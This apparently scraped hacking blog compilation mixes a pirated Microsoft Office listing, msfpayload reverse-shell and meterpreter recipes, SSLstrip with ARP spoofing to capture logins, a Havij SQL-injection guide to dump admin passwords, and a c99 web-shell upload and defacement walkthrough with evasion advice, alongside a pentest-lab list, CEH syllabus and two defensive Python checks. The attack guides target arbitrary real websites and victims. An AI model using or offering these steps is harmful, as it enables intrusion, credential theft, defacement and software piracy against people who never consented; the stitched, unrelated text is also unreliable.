WIFI hacking TUTORIAL

WIFI hacking BACKTRACK 5 complete TUTORIAL








Password: computermaniac


Microsoft Office Professional Plus 2010 Full Version


                      Microsoft Office Professional Plus 2010 Full Version + Serial Key





Microsoft Office Professional Plus 2010 Full Version + Serial Key empowers your people to do their best work from more places – whether they’re using a PC, phone or web browser. It can maximize existing investments and help people accomplish more by bringing server capabilities to everyone through familiar and intuitive applications. Office Professional Plus 2010 provides smart, simple, time-saving tools to help everyone do more with less.


We are inviting IT professionals around the world to evaluate Microsoft Office Professional Plus 2010 in your lab environments and with Microsoft Office enthusiasts in your organization. And when you download this 60-day trial software, you’re automatically registered to receive valuable resources delivered at strategic intervals throughout the software evaluation period.

Please read the following to get an idea of the key things you need to know before you evaluate Office Professional Plus 2010.
1. Use a non-primary PC for evaluation. This Office Professional Plus 2010 evaluation will de-activate in 60 days and it requires the removal of previous versions of Office prior to installation. Thus, we recommend not evaluating this software on a PC that will require an activated copy of Office after the 60 day trial period is over.
2. 60-Day evaluation expiration. This evaluation software will expire in 60 days after which it will deactivate and must be uninstalled before installing a purchased copy.
3. Technical details/updates. Before installing the software please read the Release Notes.
4. Getting started. Learn more about Office Professional Plus 2010 by visiting the Getting Started Resource Center on TechNet. Check back often for more content updates.
5. Keep up with the news. You can keep up with general technical information and news by participating in the Microsoft Office 2010 Forum (on TechNet) and reading the Microsoft Office 2010 Team Blog.
6. Keep your PC updated. Be sure to turn on automatic updates in Windows Update for Office Professional Plus 2010.


                    Microsoft Office 2007 Professional Full


    Metasploit Payloads Tutorial



    Metasploit Payloads - msfpayload


    This entry is really just a place for me to keep notes on working msfpayload details. I will expand on this post as I get more working examples.

    These payloads will be detected by AV, I will cover methods of avoiding AV detection in another post.

    In my examples 192.168.1.110 is the victim, and 192.168.1.112 is the attacker. Where I have not specified the port it will default to 4444.


    1. For a listening shell on the target

    Create payload:
    ./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe

    Target:
    run Listen-shell.exe

    Hacker:
    nc 192.168.1.110 2482



    2. For a reverse shell on the target

    Create payload:
    ./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe

    Hacker:
    ./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E

    Target:
    run reverse-shell.exe



    3. For a VNC listener on target

    Create payload:
    ./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe

    Target:
    run Listen-vnc.exe

    Hacker:
    ./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E 



    4. For a reverse VNC session

    Create payload:
    ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe

    Hacker:
    ./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E

    Target:
    run reverse-vnc.exe



    5. For a meterpreter listener

    Create payload:
    ./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe

    Target:
    run met-listen.exe

    Hacker:
    ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E



    6. For a reverse meterpreter connection (not working yet. not sure why)

    Create payload:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 X > /tmp/met-reverse.exe

    Hacker:
    ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E

    Target:
    run met-reverse.exe


    UPDATE: Payload for 6 should read:

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 LPORT=4444 X > /tmp/met-reverse.exe


    SSL Strip using Backtrack



    SSL Strip is a tool that hijacks HTTP traffic on a network by replacing all the HTTPS/SSL links with HTTP ones. Once SSL Strip is set up, all the victim's traffic is routed through the attacker and HTTP traffic is redirected to the attacker's machine. The attacker is then able to obtain all logon information by sniffing the plaintext HTTP protocol.

    How to:
    1. Set up IP Forwarding
    echo 1 > /proc/sys/net/ipv4/ip_forward

    2. Set up Port redirection using iptables
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1337

    3. Start ARP MITM
    arpspoof -i eth0 -t VICTIMIP GATEWAY

    4. Start SSL Strip Tool
    sslstrip -l 1337 -w log.txt

    5. Wait until the target logs in to a website that is supposed to use HTTPS/SSL

    6. Check log.txt for captured information
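
Seen from the victim's side, step 3 leaves a visible trace: the gateway's IP starts resolving to a different MAC address, usually one that another LAN host already uses. The following detection sketch is an added example, not part of the original post; it parses `ip neigh show` output, and the addresses, MACs and function names are constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed `ip neigh show` output taken on a client before any spoofing.
BASELINE = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.112 dev eth0 lladdr 02:00:00:00:01:12 STALE
192.168.1.120 dev eth0 lladdr 02:00:00:00:01:20 REACHABLE
"""

# Constructed output while the cache is poisoned: the gateway (192.168.1.1)
# now resolves to the MAC that belongs to 192.168.1.112.
POISONED = """\
192.168.1.1 dev eth0 lladdr 02:00:00:00:01:12 REACHABLE
192.168.1.112 dev eth0 lladdr 02:00:00:00:01:12 REACHABLE
192.168.1.120 dev eth0 lladdr 02:00:00:00:01:20 STALE
192.168.1.130 dev eth0  FAILED
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+\S+\s+"
    r"lladdr\s+(?P<mac>[0-9a-f]{2}(?::[0-9a-f]{2}){5})\b",
    re.IGNORECASE,
)


def parse_neigh(text):
    """Map IPv4 address -> MAC; entries without a resolved MAC are skipped."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def find_arp_anomalies(current, gateway_ip, baseline=None):
    """Return findings that are consistent with ARP cache poisoning.

    A shared MAC can be legitimate (proxy ARP, a router holding several
    addresses), so findings are leads to investigate, not proof.
    """
    findings = []
    if baseline:
        old, new = baseline.get(gateway_ip), current.get(gateway_ip)
        if old and new and old != new:
            findings.append(("gateway-mac-changed", gateway_ip, old, new))
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            ips.sort(key=ipaddress.ip_address)
            findings.append(("shared-mac", mac, ips))
    return findings


if __name__ == "__main__":
    results = find_arp_anomalies(
        parse_neigh(POISONED), "192.168.1.1", parse_neigh(BASELINE)
    )
    for finding in results:
        print(finding)
```
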


    Pentest lab



    Pentest lab vulnerable servers-applications list



    In this post I’m going to present some useful resources to learn about penetration testing and where
    to use exploitation tools and techniques in a safe and legal environment. This list contains a set
    of deliberately insecure LiveCDs, virtual machines and applications designed to be used as targets
    for enumeration, web exploitation, password cracking and reverse engineering.
    If you have other links/distributions/virtual machines, please leave a comment.
    List updated on 13/9/2011
    UltimateLAMP
    UltimateLAMP is an Ubuntu VM running vulnerable services and containing weak accounts.
    The UltimateLAMP VM runs the following services: Postfix, Apache, MySQL, WordPress, TextPattern, Serendipity, MediaWiki, TikiWiki, PHP, Gallery, Moodle, PHPWebSite, Joomla, eGroupWare,
    Drupal, Php Bulletin Board, Sugar CRM, Owl, WebCalendar, Dot project, PhpAdsNew, Bugzilla, OsCommerce, ZenCart, phpMyAdmin, Webmin, Mutillidae 1.5 (OWASP Top 10 Vulns)
    webgoat
    WebGoat is a deliberately insecure J2EE web application maintained by OWASP 
    designed to teach web application security lessons. In each lesson, users must demonstrate 
    their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. 
    For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. 
    The application is a realistic teaching environment, providing users with hints and code to further 
    explain the lesson.
    Holynix
    Similar to the De-ICE CDs and pWnOS, Holynix is an Ubuntu server VMware image that was deliberately
    built to have security holes for the purposes of penetration testing. More of an obstacle course than a
    real world example.
    http://pynstrom.net/index.php?page=holynix.php

    WackoPicko
    WackoPicko is a website that contains known vulnerabilities. It was first used for the paper Why
    Johnny Can’t Pentest: An Analysis of Black-box Web Vulnerability Scanners, found at:
    http://cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf

    De-ICE PenTest LiveCDs
    The PenTest LiveCDs are the creation of Thomas Wilhelm, who was transferred to a penetration test
    team at the company he worked for. Needing to learn as much about penetration testing as quickly
    as possible, Thomas began looking for both tools and targets. He found a number of tools, but no
    usable targets to practice against. Eventually, in an attempt to narrow the learning gap, Thomas
    created PenTest scenarios using LiveCDs.
    http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks
    Metasploitable
    Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable
    packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki,
    and an older mysql.
    http://blog.metasploit.com/2010/05/introducing-metasploitable.html
    Owaspbwa
    Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection
    of vulnerable web applications.
    http://code.google.com/p/owaspbwa/
    Web Security Dojo
    A free open-source self-contained training environment for Web Application Security penetration
    testing. Tools + Targets = Dojo
    http://www.mavensecurity.com/web_security_dojo/
    Lampsecurity
    LAMPSecurity training is designed to be a series of vulnerable virtual machine images along
    with complementary documentation designed to teach Linux, Apache, PHP and MySQL security.
    http://sourceforge.net/projects/lampsecurity/files/
    Damn Vulnerable Web App (DVWA)
    Damn Vulnerable Web App is a PHP/MySQL web application that is damn vulnerable. Its main goals are
    to be an aid for security professionals to test their skills and tools in a legal environment, help
    web developers better understand the processes of securing web applications and aid teachers/students
    to teach/learn web application security in a class room environment.
    www.dvwa.co.uk
    Hacking-Lab
    This is the Hacking-Lab LiveCD project. It is currently in beta stage. The LiveCD is a standardized
    client environment for solving our Hacking-Lab wargame challenges remotely.
    http://www.hacking-lab.com/hl_livecd/
    Moth 
    Moth is a VMware image with a set of vulnerable Web Applications and scripts, that you may use for:
    http://www.bonsai-sec.com/en/research/moth.php
    Exploit kb vulnerable web app
    exploit.co.il Vulnerable Web app, designed as a learning platform to test various SQL injection
    techniques. This is a fully functional web site with a content management system based on fckeditor.
    You can download it as source code or a pre configured.
    http://sourceforge.net/projects/exploitcoilvuln/
    Gruyere
    This codelab shows how web application vulnerabilities can be exploited and how to defend against
    these attacks. The best way to learn things is by doing, so you’ll get a chance to do some real
    penetration testing, actually exploiting a real application. Specifically, you’ll learn the following:
    How an application can be attacked using common web security vulnerabilities, like cross-site
    scripting vulnerabilities (XSS) and cross-site request forgery (XSRF). How to find, fix, and avoid these
    common vulnerabilities and other bugs that have a security impact, such as denial-of-service, information
    disclosure, or remote code execution. To get the most out of this lab, you should have some
     familiarity with how a web application works (e.g., general knowledge of HTML, templates, cookies,
     AJAX, etc.).
    Damn Vulnerable Linux (DVL)
    Damn Vulnerable Linux  is everything a good Linux distribution isn’t. Its developers have spent hours stuffing it with broken, ill-configured, outdated, and exploitable software that makes it vulnerable to attacks. DVL isn’t built to run on your desktop – it’s a learning tool for security students.
    http://www.damnvulnerablelinux.org
    pWnOS
    pWnOS is a “VM Image” that creates a target on which to practice penetration testing;
    the “end goal” is to get root. It was designed to practice using exploits, with multiple entry points.
    http://www.backtrack-linux.org/forums/backtrack-videos/2748-%5Bvideo%5D-attacking-pwnos.html
    Virtual Hacking Lab
    A mirror of deliberately insecure applications and old software with known vulnerabilities. Used for
    proof-of-concept/security training/learning purposes. Available in either virtual images or live ISO or
    standalone formats.
    http://sourceforge.net/projects/virtualhacking/files/
    Badstore
    Badstore.net is dedicated to helping you understand how hackers prey on Web application
    vulnerabilities, and to showing you how to reduce your exposure.
    http://www.badstore.net/
    BodgeIt Store
    The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new 
    to pen testing.
    Hackademic Challenges
    The OWASP Hackademic Challenges , is an open source project that can be used to test and
     improve one’s knowledge of information system and web application security. The OWASP
    Hackademic Challenges implement realistic scenarios with known vulnerabilities in a safe,
    controllable environment. Users can attempt to discover and exploit these vulnerabilities in order
    to learn important concepts of information security through the attacker’s perspective.
    www.hackademic.eu

    OWASP Vicnum Project
    A flexible web app showing vulnerabilities such as cross site scripting, sql injections,and session
    management issues. Helpful to IT auditors honing web security skills and setting up ‘capture the flag’ .
    Play the game at http://vicnum.ciphertechs.com
    https://sourceforge.net/projects/vicnum/

    Stanford SecuriBench
    Stanford SecuriBench is a set of open source real-life programs to be used as a testing ground 
    for static and dynamic security tools. Release .91a focuses on Web-based applications written in Java.
    Kioptrix
    The Kioptrix VM images are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is
    to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more
    ways than one to successfully complete the challenges.
    http://www.kioptrix.com/blog/?page_id=135
    Hackxor
    Hackxor is a webapp hacking game where players must locate and exploit vulnerabilities to
    progress through the story. Think WebGoat but with a plot and a focus on realism and difficulty. Contains
    XSS, CSRF, SQLi, ReDoS, DOR, command injection, etc.
    Project GameOver:
    Project GameOver was started with the objective of training and educating newbies about the basics
    of web security, educating them about the common web attacks and helping them understand how they work. It is a collection of various vulnerable web applications, designed for the purpose of learning web penetration testing. We have included some of the above mentioned deliberately vulnerable websites.


    Comptia N+ Ebook








    LESSON 1: Basic Network Theory
    Network Definitions
    Network Models
    Connectivity
    Network Addressing
    Signaling Concepts

    LESSON 2: Network Connectivity
    The Data Package
    Establishing a Connection
    Reliable Delivery
    Network Connectivity
    Noise Control
    Building Codes
    Connection Devices

    LESSON 3: Advanced Network Theory
    The OSI Model
    Ethernet
    Network Resources
    Token Ring/IEEE 802.5
    FDDI
    Wireless Networking

    LESSON 4: Common Network Protocols
    Families of Protocols
    NetBEUI
    Bridges and Switches
    The TCP/IP Protocol
    Building a TCP/IP Network
    The TCP/IP Suite

    LESSON 5: TCP/IP Services
    Dynamic Host Configuration Protocol
    DNS Name Resolution
    NetBIOS Support
    SNMP
    TCP/IP Utilities
    Upper Layer Services: FTP

    LESSON 6: Alternate Network Protocols
    Introduction to IPX/SPX
    AppleTalk
    Introduction to Apple Open Transport
    Introduction to IPv6

    LESSON 7: Network LAN Infrastructure
    Implement LAN Protocols on a Network
    IP Routing
    IP Routing Tables
    Router Discovery Protocols
    Data Movement in a Routed Network
    Virtual LANs (VLANs)

    LESSON 8: Network WAN Infrastructure
    The WAN Environment
    WAN Transmission Technologies
    WAN Connectivity Devices
    Voice Over Data Services

    LESSON 9: Remote Networking
    Remote Networking
    Remote Access Protocols
    VPN Technologies

    LESSON 10: Network Security
    Introduction to Network Security
    Virus Protection
    Local Security
    Network Access
    Internet Security

    LESSON 11: Disaster Recovery
    The Need for Disaster Recovery
    Disaster Recovery Plan
    Data Backups
    Fault Tolerance

    LESSON 12: Advanced Data Storage Techniques
    Enterprise Data Storage
    Clustering
    Network Attached Storage
    Storage Area Networks

    LESSON 13: Network Troubleshooting
    Using a Systematic Approach to Troubleshooting
    Network Support Tools: Utilities
    The Network Baseline

    LESSON 14: Network Operating Systems
    Novell NetWare
    Microsoft BackOffice
    Linux History and Operation
    Macintosh

    LESSON 15: Appendix
    Appendix



    Havij Tutorial-Website Hacking





    This is a simple tutorial on how to use Havij to hack sites.

    1. First, find a site vulnerable to SQLi.

    2. Open Havij and copy and paste the vulnerable link, as shown in the figure.

    3. It then shows some messages. Watch them and be patient for a while as it finds whether the site is vulnerable, the type of injection and whether the DB server is MySQL, and it will find the database name. You then get the database name, like xxxx_xxxx.

    4. Then move on to another operation to find the tables by clicking "tables", as shown in the figure. Now click "Get tables", then wait some time if needed.

    5. Once the tables are found, you will see "users" among them. Put a mark on it and click the "get columns" tab, as shown in the figure.

    6. There, just mark username and password and click "Get data".

    7. Bingo: you now have an ID and password that may be the admin's.
    The password comes back as MD5; you can also crack it using this tool, as shown in the figure.






    Hack Website


    Upload Shell and Deface a Website







    What we need:

    1-A Shell (Will be provided)

    2-A website vulnerable to SQLi

    3-Image or File upload area on that Vulnerable website

    So firstly download the shell here.



    What is Shell ?

    A shell script is a script written for the shell, or command line interpreter, of an operating system. It is often considered a simple domain-specific programming language. Typical operations performed by shell scripts include file manipulation, program execution, and printing text.
    This is a plain c99 shell, BUT it is undetected, so you should not get a warning from an antivirus if you download it. (Update: not undetected anymore.)


    So now go get yourself a vulnerable site, hack it and get the Admin Login details and get the Admin Page address.

    Now login to the admin page with the admin details you got.

    Go through the admin page until you find a place where you can upload a picture (Usually a picture).

    Now you have to upload the shell. If you don’t get an error, it is all good.

    Now to find the shell

    Go through the site until you find any image and, if you are using Firefox, right-click on it and choose “Copy Image Location”.

    Make a new tab and paste it there.

    It will probably look something like this:

    http://www.example.com/images/photonamehere.jpg

    So now that we know that, change “/photonamehere.jpg” to “/c99ud.php.jpg” (without quotes).

    Now a page will come up looking like this:


    It will probably not look exactly like that, but it will look similar.

    Now you have access to all the files on the site
    What you want to do is now,
    Find index.php or whatever the main page is, and replace it with your HTML code for your Deface Page.

    Then you can either delete all the other files OR (and I recommend this) Let it redirect to the main page.

    Keep in mind:

    • Change Admin Username and Password

    • The people have FTP access, so you need to change that password too.

    • Always use a Proxy or VPN
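
The upload step above works only when the image upload accepts a name such as `c99ud.php.jpg`, which some server configurations still hand to the PHP interpreter, and stores it under that name in a web-served directory. The following upload check for the defending side is an added example, not part of the original post; the function name, reason codes and sample bytes are constructed for illustration.

```python
import os
import secrets

# Allowed final extensions and the magic bytes their content must start with.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# Extensions that must not appear in ANY segment of the name, because a
# handler may be mapped to an inner segment of a multi-extension file name.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar",
               "pl", "py", "cgi", "asp", "aspx", "jsp", "sh"}

# Constructed samples: a minimal JPEG-looking byte string and a harmless script.
JPEG_BYTES = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16 + b"\xff\xd9"
PHP_TEXT = b"<?php echo 1; ?>"


def validate_upload(filename, data):
    """Return (ok, reason, stored_name) for an uploaded image.

    stored_name is a random server-side name; the client-supplied name is
    never used on disk, so it cannot choose the extension the server sees.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    if "\x00" in base:
        return (False, "nul-byte-in-name", None)
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return (False, "missing-extension", None)
    ext = "." + parts[-1]
    if ext not in ALLOWED:
        return (False, "extension-not-allowed", None)
    if any(p in SCRIPT_EXTS for p in parts[1:-1]):
        return (False, "script-extension", None)
    if not data.startswith(ALLOWED[ext]):
        return (False, "content-mismatch", None)
    # Heuristic for polyglots: valid image header with script text appended.
    if b"<?php" in data.lower():
        return (False, "embedded-script", None)
    return (True, "ok", secrets.token_hex(16) + ext)


if __name__ == "__main__":
    samples = [
        ("c99ud.php.jpg", PHP_TEXT),
        ("photo.jpg", PHP_TEXT),
        ("photo.jpg", JPEG_BYTES + PHP_TEXT),
        ("holiday.jpg", JPEG_BYTES),
    ]
    for name, body in samples:
        print(name, validate_upload(name, body)[:2])
```

Checks like these complement, and do not replace, storing uploads outside the web root or in a directory where script execution is disabled.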


    Online hacking Tools



    Online Tools




    Footprinting 


    Hash Cracking


    Converters

    Binary Translator


    Ethical Hacking Syllabus overview



    Certified Ethical Hacking Syllabus


    Certified Ethical Hacker (312-50) CEH
    1. CEH Ethics and Legal Issues
    2. CEH Footprinting
    3. CEH Scanning
    4. CEH Enumeration
    5. CEH System Hacking
    6. CEH Trojans and Backdoors
    7. CEH Sniffers
    8. CEH Denial of Service
    9. CEH Social Engineering
    10. CEH Session Hijacking
    11. CEH Hacking Web Servers
    12. CEH Web Application Vulnerabilities
    13. CEH Web Based Password Cracking Techniques
    14. CEH SQL Injection
    15. CEH Hacking Wireless Networks
    16. CEH Virus and Worms
    17. CEH Hacking Novell
    18. CEH Hacking Linux
    19. CEH IDS, Firewalls and Honeypots
    20. CEH Buffer Overflows
    21. CEH Cryptography
    22. CEH Penetration Testing Methodologies

    Certified Ethical Hacker (CEH) Module 1: Ethics and Legality
    • What is an Exploit?
    • The security functionality triangle
    • The attacker's process
    • Passive reconnaissance
    • Active reconnaissance
    • Types of attacks
    • Categories of exploits
    • Goals attackers try to achieve
    • Ethical hackers and crackers - who are they
    • Self proclaimed ethical hacking
    • Hacking for a cause (Hacktivism)
    • Skills required for ethical hacking
    •   Categories of Ethical Hackers
    •   What do Ethical Hackers do?
    •   Security evaluation plan
    •   Types of Ethical Hacks
    •   Testing Types
    •   Ethical Hacking Report
    •   Cyber Security Enhancement Act of 2002
    •   Computer Crimes
    •   Overview of US Federal Laws
    •   Section 1029
    •   Section 1030
    •   Hacking Punishment

    Certified Ethical Hacker (CEH) Module 2: Footprinting
    • What is Footprinting
    • Steps for gathering information
    • Whois
    • http://tucows.com
    • Hacking Tool: Sam Spade
    • Analyzing Whois output
    • NSLookup
    • Finding the address range of the network
    •   ARIN
    •   Traceroute
    •   Hacking Tool: NeoTrace
    •   Visual Route
    •   Visual Lookout
    •   Hacking Tool: Smart Whois
    •   Hacking Tool: eMailTracking Pro
    •   Hacking Tool: MailTracking.com

    Certified Ethical Hacker (CEH) Module 3: Scanning
    • Determining if the system is alive?
    • Active stack fingerprinting
    • Passive stack fingerprinting
    • Hacking Tool: Pinger
    • Hacking Tool: Friendly Pinger
    • Hacking Tool: WS_Ping_Pro
    • Hacking Tool: Netscan Tools Pro 2000
    • Hacking Tool: Hping2
    • Hacking Tool: KingPing
    • Hacking Tool: icmpenum
    • Hacking Tool: SNMP Scanner
    • Detecting Ping sweeps
    • ICMP Queries
    • Hacking Tool: netcraft.com
    • Port Scanning
    • TCPs 3-way handshake
    • TCP Scan types
    • Hacking Tool: IPEye
    • Hacking Tool: IPSECSCAN
    •   Hacking Tool: nmap
    •   Port Scan countermeasures
    •   Hacking Tool: HTTrack Web Copier
    •   Network Management Tools
    •   SolarWinds Toolset
    •   NeoWatch
    •  War Dialing
    •   Hacking Tool: THC-Scan
    •   Hacking Tool: PhoneSweep War Dialer
    •   Hacking Tool: Telesweep
    •   Hacking Tool: Queso
    •   Hacking Tool: Cheops
    •   Proxy Servers
    •   Hacking Tool: SocksChain
    •   Surf the web anonymously
    •   TCP/IP through HTTP Tunneling
    •   Hacking Tool: HTTPort
    •   Hacking Tool: Tunneld
    •   Hacking Tool: BackStealth

    Certified Ethical Hacker (CEH) Module 4: Enumeration
    • Determining if the system is alive?
    • What is Enumeration
    • NetBios Null Sessions
    • Null Session Countermeasures
    • NetBIOS Enumeration
    • Hacking Tool: DumpSec
    • Hacking Tool: Hyena
    • Hacking Tool: NAT
    • SNMP Enumeration
    • SNMPUtil
    • Hacking Tool: IP Network Browser
    • SNMP Enumeration Countermeasures
    • Windows 2000 DNS Zone transfer
    •  Identifying Win2000 Accounts
    •  Hacking Tool: User2SID
    •  Hacking Tool: SID2User
    •  Hacking Tool: Enum
    •  Hacking Tool: UserInfo
    •  Hacking Tool: GetAcct
    •  Hacking Tool: smbbf
    •  SMB Auditing Tools
    •  Active Directory Enumeration
    •  W2K Active Directory attack


    Certified Ethical Hacker (CEH) Module 5: System Hacking
    • Administrator Password Guessing
    • Performing Automated Password Guessing
    • Legion
    • NTInfoScan
    • Defending Against Password Guessing
    • Monitoring Event Viewer Logs
    • VisualLast
    • Eavesdropping on Network Password Exchange
    • Hacking Tool: L0phtCrack
    • Hacking Tool: KerbCrack
    • Privilege Escalation
    • Hacking Tool: GetAdmin
    • Hacking Tool: hk
    • Manual Password Cracking Algorithm
    • Automatic Password Cracking Algorithm
    • Password Types
    • Types of Password Attacks
    • Dictionary Attack
    • Brute Force Attack
    • Distributed Brute Force Attack
    • Password Change Interval
    • Hybrid Attack
    • Cracking Windows 2000 Passwords
    • Retrieving the SAM file
    • Redirecting SMB Logon to the Attacker
    • SMB Redirection
    • Hacking Tool: SMBRelay
    • Hacking Tool: SMBRelay2
    • Hacking Tool: pwdump2
    • Hacking Tool: SAMdump
    • Hacking Tool: C2MYAZZ
    • Win32 Create Local Admin User
    • Offline NT Password Resetter
    • Hacking Tool: psexec
    • Hacking Tool: remoxec
    • SMBRelay Man-in-the-Middle (MITM)
    • SMBRelay MITM Countermeasures
    • Hacking Tool: SMBGrinder
    • Hacking Tool: SMBDie
    • Hacking Tool: NBTDeputy
    • NetBIOS DoS Attack
    • Hacking Tool: nbname
    • Hacking Tool: John the Ripper
    • LanManager Hash

    Certified Ethical Hacker (CEH) Module 6: Trojans and Backdoors
    • What is a Trojan Horse?
    • Overt and Covert
    • Hacking Tool: QAZ
    • Hacking Tool: Tini
    • Hacking Tool: Netcat
    • Hacking Tool: Donald Dick
    • Hacking Tool: SubSeven
    • Hacking Tool: BackOrifice 2000
    • Back Orifice Plug-ins
    • BoSniffer
    • Hacking Tool: NetBus
    • ComputerSpy Key Logger
    • Hacking Tool: Beast Trojan
    • Hacking Tool: CyberSpy Telnet Trojan
    • Hacking Tool: SubRoot Telnet Trojan
    • Hacking Tool: LetMeRule
    • Wrappers
    • Hacking Tool: Graffiti
    • Hacking Tool: Silk Rope 2000
    • Hacking Tool: EliteWrap
    • Hacking Tool: IconPlus
    • Packaging Tool: Microsoft WordPad

    • Hacking Tool: Whack a Mole Trojan Construction Kit
    • Writing Trojans in Java
    • Hacking Tool: FireKiller 2000
    • Covert Channels
    • ICMP Tunneling
    • Hacking Tool: Loki
    • Reverse WWW Shell
    • Backdoor Countermeasures
    • BO Startup and Registry Entries
    • NetBus Startup and Registry Keys
    • Port Monitoring Tools
    • fPort
    • TCPView
    • Process Viewer
    • Inzider - Tracks Processes and Ports
    • Trojan Maker
    • Hacking Tool: Hard Disk Killer
    • Man-in-the-Middle Attack
    • Hacking Tool: dsniff
    • System File Verification
    • TripWire

    Certified Ethical Hacker (CEH) Module 7: Sniffers
    • What is a Sniffer?
    • Hacking Tool: Ethereal
    • Hacking Tool: Snort
    • Hacking Tool: WinDump
    • Hacking Tool: EtherPeek
    • Passive Sniffing
    • Active Sniffing
    • Hacking Tool: EtherFlood
    • How ARP Works?
    • Hacking Tool: ArpSpoof
    • Hacking Tool: DSniff
    • Hacking Tool: Macof
    • Hacking Tool: mailsnarf
    • Hacking Tool: URLsnarf
    • Hacking Tool: Webspy
    • Hacking Tool: Ettercap

    • Hacking Tool: WebMiTM
    • IP Restrictions Scanner
    • Hacking Tool: sTerm
    • Hacking Tool: Cain and Abel
    • Hacking Tool: Packet Crafter
    • Hacking Tool: SMAC
    • MAC Changer
    • ARP Spoofing Countermeasures
    • Hacking Tool: WinDNSSpoof
    • Hacking Tool: Distributed DNS Flooder
    • Hacking Tool: WinSniffer
    • Network Tool: IRIS
    • Network Tool: NetInterceptor
    • SniffDet
    • Hacking Tool: WinTCPKill

    Certified Ethical Hacker (CEH) Module 8: Denial of Service
    • What is Denial of Service Attack?             
    • Types of DoS Attacks
    • How DoS Work?
    • What is DDoS?
    • Hacking Tool: Ping of Death
    • Hacking Tool: SSPing
    • Hacking Tool: Land
    • Hacking Tool: Smurf
    • Hacking Tool: SYN Flood
    • Hacking Tool: CPU Hog
    • Hacking Tool: Win Nuke
    • Hacking Tool: RPC Locator
    • Hacking Tool: Jolt2
    • Hacking Tool: Bubonic
    • Hacking Tool: Targa
    • Tools for Running DDoS Attacks

    • Hacking Tool: Trinoo
    • Hacking Tool: WinTrinoo
    • Hacking Tool: TFN
    • Hacking Tool: TFN2K
    • Hacking Tool: Stacheldraht
    • Hacking Tool: Shaft
    • Hacking Tool: mstream
    • DDoS Attack Sequence
    • Preventing DoS Attack
    • DoS Scanning Tools
    • Find_ddos
    • SARA
    • DDoSPing
    • RID
    • Zombie Zapper

    Certified Ethical Hacker (CEH) Module 9: Social Engineering
    • What is Social Engineering?
    • Art of Manipulation
    • Human Weakness
    • Common Types of Social Engineering
    • Human Based Impersonation
    • Important User
    • Tech Support
    • Third Party Authorization
    • In Person
    • Dumpster Diving

    • Shoulder Surfing
    • Computer Impersonation
    • Mail Attachments
    • Popup Windows
    • Website Faking
    • Reverse Social Engineering
    • Policies and Procedures
    • Social Engineering Security Policies
    • The Importance of Employee Education

    Certified Ethical Hacker (CEH) Module 10: Session Hijacking
    • What is Session Hijacking?   
    • Session Hijacking Steps
    • Spoofing Vs Hijacking
    • Active Session Hijacking
    • Passive Session Hijacking
    • TCP Concepts - 3 way Handshake
    • Sequence Numbers
    • Sequence Number Example
    • Guessing the Sequence Numbers

    •   Hacking Tool: Juggernaut
    •   Hacking Tool: Hunt
    •   Hacking Tool: TTYWatcher
    •   Hacking Tool: IP Watcher
    •   Hacking Tool: T-Sight
    •   Remote TCP Session Reset Utility
    •   Dangers Posed by Session Hijacking
    •   Protection against Session Hijacking

    Certified Ethical Hacker (CEH) Module 11: Hacking Web Servers
    • Apache Vulnerability
    • Attacks against IIS
    • IIS Components
    • ISAPI DLL Buffer Overflows
    • IPP Printer Overflow
    • msw3prt.dll
    • Oversized Print Requests
    • Hacking Tool: Jill32
    • Hacking Tool: IIS5-Koei
    • Hacking Tool: IIS5Hack
    • IPP Buffer Overflow Countermeasures
    • ISAPI DLL Source Disclosure
    • ISAPI.DLL Exploit
    • Defacing Web Pages
    • IIS Directory Traversal
    • Unicode
    • Directory Listing
    • Clearing IIS Logs
    • Network Tool: LogAnalyzer
    • Attack Signature
    • Creating Internet Explorer (IE) Trojan
    • Hacking Tool: IISExploit

    • Hacking Tool: UnicodeUploader.pl
